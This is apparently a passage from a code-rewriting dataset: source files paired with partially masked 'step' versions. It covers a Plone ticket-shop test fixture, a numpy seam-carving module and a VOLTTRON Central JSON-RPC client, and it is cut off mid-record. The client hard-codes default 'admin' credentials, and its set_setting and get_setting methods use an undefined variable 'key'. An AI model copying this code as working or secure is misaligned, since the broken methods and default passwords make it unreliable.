password=\"vendor1\")\n cru(email=\"[email protected]\", username=\"vendor2\", password=\"vendor2\")\n\n # Create test content\n crc = plone.api.content.create\n\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title=\"item_11\")\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title=\"item_12\")\n\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title=\"item_21\")\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title=\"item_22\")\n\n\nTicketshopAT_FIXTURE = TicketshopATLayer()\nTicketshopAT_INTEGRATION_TESTING = IntegrationTesting(\n bases=(TicketshopAT_FIXTURE,),\n name=\"TicketshopAT:Integration\")\nTicketshopAT_ROBOT_TESTING = FunctionalTesting(\n bases=(\n MOCK_MAILHOST_FIXTURE,\n TicketshopAT_FIXTURE,\n z2.ZSERVER_FIXTURE\n ),\n name=\"TicketshopAT:Robot\")\n",
"step-ids": [
4,
7,
10,
11,
14
]
}
|
[
4,
7,
10,
11,
14
] |
import numpy as np
def get_mask(mask):
r = mask[:, :, 0]
g = mask[:, :, 1]
return r // (r.max() or 1) * -1 + g // (g.max() or 1)
def calculate_brightness(image):
weights = np.array([0.299, 0.587, 0.114])
brightness_matrix = (image*weights).sum(axis=2)
return brightness_matrix
def calculate_energy(brightness):
x_gradient = np.hstack((
(brightness[:, 1] - brightness[:, 0])[:, np.newaxis],
brightness[:, 2:] - brightness[:, :-2],
(brightness[:, -1] - brightness[:, -2])[:, np.newaxis]
))
y_gradient = np.vstack((
brightness[1, :] - brightness[0, :],
brightness[2:, :] - brightness[:-2, :],
brightness[-1, :] - brightness[-2, :]
))
return np.sqrt(x_gradient ** 2 + y_gradient ** 2)
def calculate_minimal_seam_matrix(pre_energy, mask=None):
min_seam_searcher = pre_energy + mask if mask is not None else pre_energy.copy()
for i in range(1, min_seam_searcher.shape[0]):
row = min_seam_searcher[i-1]
minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append(row[1:], row[-1]))).min(axis=0)
min_seam_searcher[i] += minimum
return min_seam_searcher
def get_minimal_seam(min_seam):
seam = np.zeros(min_seam.shape[0], dtype=np.int32)
seam[-1] = np.argmin(min_seam[-1])
for i in range(min_seam.shape[0] - 2, -1, -1):
last = seam[i+1]
if last == 0:
seam[i] = np.argmin(min_seam[i, : 2])
elif last == min_seam.shape[1] - 1:
seam[i] = last + np.argmin(min_seam[i, (last - 1):]) - 1
else:
seam[i] = last + np.argmin(min_seam[i, (last - 1): (last + 2)]) - 1
return seam
def cut(image, mask):
brightness = calculate_brightness(image)
energy = calculate_energy(brightness)
mult = image.shape[0] * image.shape[1] * 256
min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)
seam = get_minimal_seam(min_seam)
copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)
copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32) if mask is not None else None
seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)
for row, i in enumerate(seam):
copy[row] = np.delete(image[row], i, axis=0)
if mask is not None:
copy_mask[row] = np.delete(mask[row], i, axis=0)
seam_mask[row][i] = 1
return copy, copy_mask, seam_mask
def extend(image, mask):
brightness = calculate_brightness(image)
energy = calculate_energy(brightness)
mult = image.shape[0] * image.shape[1] * 256
min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)
seam = get_minimal_seam(min_seam)
copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)
copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32) if mask is not None else None
seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)
for row, i in enumerate(seam):
if i >= image.shape[1] - 1:
copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)
if mask is not None:
copy_mask[row] = np.append(mask[row], 0)
copy_mask[row][-2] = 1
copy_mask[row][-1] = 1
else:
copy[row] = np.insert(image[row], i+1, image[row][i] // 2 + image[row][i+1] // 2, axis=0)
if mask is not None:
copy_mask[row] = np.insert(mask[row], i+1, 0, axis=0)
copy_mask[row][i] = 1
copy_mask[row][i+1] = 1
seam_mask[row][i] = 1
return copy, copy_mask, seam_mask
def seam_carve(image, mode, mask):
if mode == 'horizontal shrink':
return cut(image, mask)
elif mode == 'vertical shrink':
transposed_image, transposed_mask, transposed_seam_mask = cut(
np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None
)
return (np.transpose(transposed_image, (1, 0, 2)),
transposed_mask.T if mask is not None else None,
transposed_seam_mask.T)
elif mode == 'horizontal expand':
return extend(image, mask)
else:
transposed_image, transposed_mask, transposed_seam_mask = extend(
np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None
)
return (np.transpose(transposed_image, (1, 0, 2)),
transposed_mask.T if mask is not None else None,
transposed_seam_mask.T)
|
normal
|
{
"blob_id": "7130a382784955780a3f258c81ce05c61915af56",
"index": 5000,
"step-1": "<mask token>\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\n<mask token>\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-2": "<mask token>\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image * weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack(((brightness[:, 1] - brightness[:, 0])[:, np.\n newaxis], brightness[:, 2:] - brightness[:, :-2], (brightness[:, -1\n ] - brightness[:, -2])[:, np.newaxis]))\n y_gradient = np.vstack((brightness[1, :] - brightness[0, :], brightness\n [2:, :] - brightness[:-2, :], brightness[-1, :] - brightness[-2, :]))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\n<mask token>\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-3": "<mask token>\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image * weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack(((brightness[:, 1] - brightness[:, 0])[:, np.\n newaxis], brightness[:, 2:] - brightness[:, :-2], (brightness[:, -1\n ] - brightness[:, -2])[:, np.newaxis]))\n y_gradient = np.vstack((brightness[1, :] - brightness[0, :], brightness\n [2:, :] - brightness[:-2, :], brightness[-1, :] - brightness[-2, :]))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\ndef calculate_minimal_seam_matrix(pre_energy, mask=None):\n min_seam_searcher = (pre_energy + mask if mask is not None else\n pre_energy.copy())\n for i in range(1, min_seam_searcher.shape[0]):\n row = min_seam_searcher[i - 1]\n minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append\n (row[1:], row[-1]))).min(axis=0)\n min_seam_searcher[i] += minimum\n return min_seam_searcher\n\n\n<mask token>\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-4": "import numpy as np\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image * weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack(((brightness[:, 1] - brightness[:, 0])[:, np.\n newaxis], brightness[:, 2:] - brightness[:, :-2], (brightness[:, -1\n ] - brightness[:, -2])[:, np.newaxis]))\n y_gradient = np.vstack((brightness[1, :] - brightness[0, :], brightness\n [2:, :] - brightness[:-2, :], brightness[-1, :] - brightness[-2, :]))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\ndef calculate_minimal_seam_matrix(pre_energy, mask=None):\n min_seam_searcher = (pre_energy + mask if mask is not None else\n pre_energy.copy())\n for i in range(1, min_seam_searcher.shape[0]):\n row = min_seam_searcher[i - 1]\n minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append\n (row[1:], row[-1]))).min(axis=0)\n min_seam_searcher[i] += minimum\n return min_seam_searcher\n\n\ndef get_minimal_seam(min_seam):\n seam = np.zeros(min_seam.shape[0], dtype=np.int32)\n seam[-1] = np.argmin(min_seam[-1])\n for i in range(min_seam.shape[0] - 2, -1, -1):\n last = seam[i + 1]\n if last == 0:\n seam[i] = np.argmin(min_seam[i, :2])\n elif last == min_seam.shape[1] - 1:\n seam[i] = last + np.argmin(min_seam[i, last - 1:]) - 1\n else:\n seam[i] = last + np.argmin(min_seam[i, last - 1:last + 2]) - 1\n return seam\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not\n None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32\n ) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i + 1, image[row][i] // 2 + \n image[row][i + 1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i + 1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i + 1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(np.\n transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(np\n .transpose(image, (1, 0, 2)), mask.T if mask is not None else None)\n return (np.transpose(transposed_image, (1, 0, 2)), transposed_mask.\n T if mask is not None else None, transposed_seam_mask.T)\n",
"step-5": "import numpy as np\n\n\ndef get_mask(mask):\n r = mask[:, :, 0]\n g = mask[:, :, 1]\n return r // (r.max() or 1) * -1 + g // (g.max() or 1)\n\n\ndef calculate_brightness(image):\n weights = np.array([0.299, 0.587, 0.114])\n brightness_matrix = (image*weights).sum(axis=2)\n return brightness_matrix\n\n\ndef calculate_energy(brightness):\n x_gradient = np.hstack((\n (brightness[:, 1] - brightness[:, 0])[:, np.newaxis],\n brightness[:, 2:] - brightness[:, :-2],\n (brightness[:, -1] - brightness[:, -2])[:, np.newaxis]\n ))\n y_gradient = np.vstack((\n brightness[1, :] - brightness[0, :],\n brightness[2:, :] - brightness[:-2, :],\n brightness[-1, :] - brightness[-2, :]\n ))\n return np.sqrt(x_gradient ** 2 + y_gradient ** 2)\n\n\ndef calculate_minimal_seam_matrix(pre_energy, mask=None):\n min_seam_searcher = pre_energy + mask if mask is not None else pre_energy.copy()\n for i in range(1, min_seam_searcher.shape[0]):\n row = min_seam_searcher[i-1]\n minimum = np.vstack((np.insert(row[:-1], 0, row[0]), row, np.append(row[1:], row[-1]))).min(axis=0)\n min_seam_searcher[i] += minimum\n return min_seam_searcher\n\n\ndef get_minimal_seam(min_seam):\n seam = np.zeros(min_seam.shape[0], dtype=np.int32)\n seam[-1] = np.argmin(min_seam[-1])\n for i in range(min_seam.shape[0] - 2, -1, -1):\n last = seam[i+1]\n if last == 0:\n seam[i] = np.argmin(min_seam[i, : 2])\n elif last == min_seam.shape[1] - 1:\n seam[i] = last + np.argmin(min_seam[i, (last - 1):]) - 1\n else:\n seam[i] = last + np.argmin(min_seam[i, (last - 1): (last + 2)]) - 1\n return seam\n\n\ndef cut(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] - 1, 3), np.uint8)\n copy_mask = np.empty((image.shape[0], image.shape[1] - 1), np.int32) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n copy[row] = np.delete(image[row], i, axis=0)\n if mask is not None:\n copy_mask[row] = np.delete(mask[row], i, axis=0)\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef extend(image, mask):\n brightness = calculate_brightness(image)\n energy = calculate_energy(brightness)\n mult = image.shape[0] * image.shape[1] * 256\n min_seam = calculate_minimal_seam_matrix(energy, mask * mult if mask is not None else None)\n seam = get_minimal_seam(min_seam)\n copy = np.empty((image.shape[0], image.shape[1] + 1, 3), np.uint8)\n copy_mask = np.zeros((image.shape[0], image.shape[1] + 1), np.int32) if mask is not None else None\n seam_mask = np.zeros(image.shape[:2], dtype=np.uint8)\n for row, i in enumerate(seam):\n if i >= image.shape[1] - 1:\n copy[row] = np.concatenate((image[row], [image[row][-1]]), axis=0)\n if mask is not None:\n copy_mask[row] = np.append(mask[row], 0)\n copy_mask[row][-2] = 1\n copy_mask[row][-1] = 1\n else:\n copy[row] = np.insert(image[row], i+1, image[row][i] // 2 + image[row][i+1] // 2, axis=0)\n if mask is not None:\n copy_mask[row] = np.insert(mask[row], i+1, 0, axis=0)\n copy_mask[row][i] = 1\n copy_mask[row][i+1] = 1\n seam_mask[row][i] = 1\n return copy, copy_mask, seam_mask\n\n\ndef seam_carve(image, mode, mask):\n if mode == 'horizontal shrink':\n return cut(image, mask)\n elif mode == 'vertical shrink':\n transposed_image, transposed_mask, transposed_seam_mask = cut(\n np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None\n )\n return (np.transpose(transposed_image, (1, 0, 2)),\n transposed_mask.T if mask is not None else None,\n transposed_seam_mask.T)\n elif mode == 'horizontal expand':\n return extend(image, mask)\n else:\n transposed_image, transposed_mask, transposed_seam_mask = extend(\n np.transpose(image, (1, 0, 2)), mask.T if mask is not None else None\n )\n return (np.transpose(transposed_image, (1, 0, 2)),\n transposed_mask.T if mask is not None else None,\n transposed_seam_mask.T)\n",
"step-ids": [
3,
6,
7,
9,
10
]
}
|
[
3,
6,
7,
9,
10
] |
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import requests
"""
This example exposes the VOLTTRON web API
through a python class that that does not depend
on VOLTTRON proper. A VOLTTRON Central Agent must
be running on the url passed to the constructor.
"""
class VolttronWebRPC(object):
def __init__(self, url, username='admin', password='admin'):
"""
:param url: Jsonrpc endpoint for posting data.
:param username:
:param password:
"""
self._url = url
self._username = username
self._password = password
self._auth_token = None
self._auth_token = self.get_auth_token()
def do_rpc(self, method, **params):
"""
Generic method to request data from Volttron Central
:param method: Method to call
:param params: Any method specific keyword arguments
"""
data = {
'jsonrpc': '2.0',
'method': method,
'params': params,
'authorization': self._auth_token,
'id': '1'
}
r = requests.post(self._url, json=data)
validate_response(r)
return r.json()['result']
def get_auth_token(self):
"""
Get an authorization token from Volttron Central,
automatically called when the object is created
"""
return self.do_rpc('get_authorization',
username=self._username,
password=self._password)
def register_instance(self, addr, name=None):
"""
Register a platform with Volttron Central
:param addr: Platform's discovery address that will be registered
"""
return self.do_rpc('register_instance',discovery_address=addr,
display_name=name)
def list_platforms(self):
"""
Get a list of registered platforms from Volttron Central.
"""
return self.do_rpc('list_platforms')
def install_agent(self, platform_uuid, fileargs):
"""
Install an agent on a platform
:param platform_uuid: uuid of platform where agent will be installed
:param fileargs: arguments for installing the agent
"""
rpc = 'platforms.uuid.{}.install'.format(platform_uuid)
return self.do_rpc(rpc, files=[fileargs])
def list_agents(self, platform_uuid):
"""
List agents installed on a platform
"""
return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')
def unregister_platform(self, platform_uuid):
"""
Unregister a platform with Volttron Central
"""
return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)
def store_agent_config(self, platform_uuid, agent_identity, config_name,
raw_contents, config_type="json"):
"""
Add a file to the an agent's config store
:param platform_uuid: uuid of platform where agent will is installed
:param agent_identity: VIP identity of agent that will own the config
:param config_name: name of the configuration file
:param raw_contents: file data
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw_contents=raw_contents,
config_type=config_type)
return self.do_rpc("store_agent_config", **params)
def list_agent_configs(self, platform_uuid, agent_identity):
"""
List the configuration files stored for an agent.
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the configs
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity)
return self.do_rpc("list_agent_configs", **params)
def get_agent_config(self, platform_uuid, agent_identity, config_name,
raw=True):
"""
Get a config file from an agent's Configuration Store
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the config
:param config_name: name of the configuration file
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw=raw)
return self.do_rpc("get_agent_config", **params)
def set_setting(self, setting, value):
"""
Assign a value to a setting in Volttron Central
:param setting: Name of the setting to set
:param value: Value to assign to setting
"""
return self.do_rpc("set_setting", key=key, value=value)
def get_setting(self, setting):
"""
Get the value of a setting in Volttron Central
:param setting: Name of the setting to get
"""
return self.do_rpc("get_setting", key=key)
def get_setting_keys(self):
"""
Get a list of settings in Volttorn Central
"""
return self.do_rpc("get_setting_keys")
def validate_response(response):
"""
Validate that the message is a json-rpc response.
:param response:
:return:
"""
assert response.ok
rpcdict = response.json()
assert rpcdict['jsonrpc'] == '2.0'
assert rpcdict['id']
assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()
|
normal
|
{
"blob_id": "6fdfcbcfdf2b680a1fbdb74f77fd5d1a9f7eac0b",
"index": 6105,
"step-1": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n 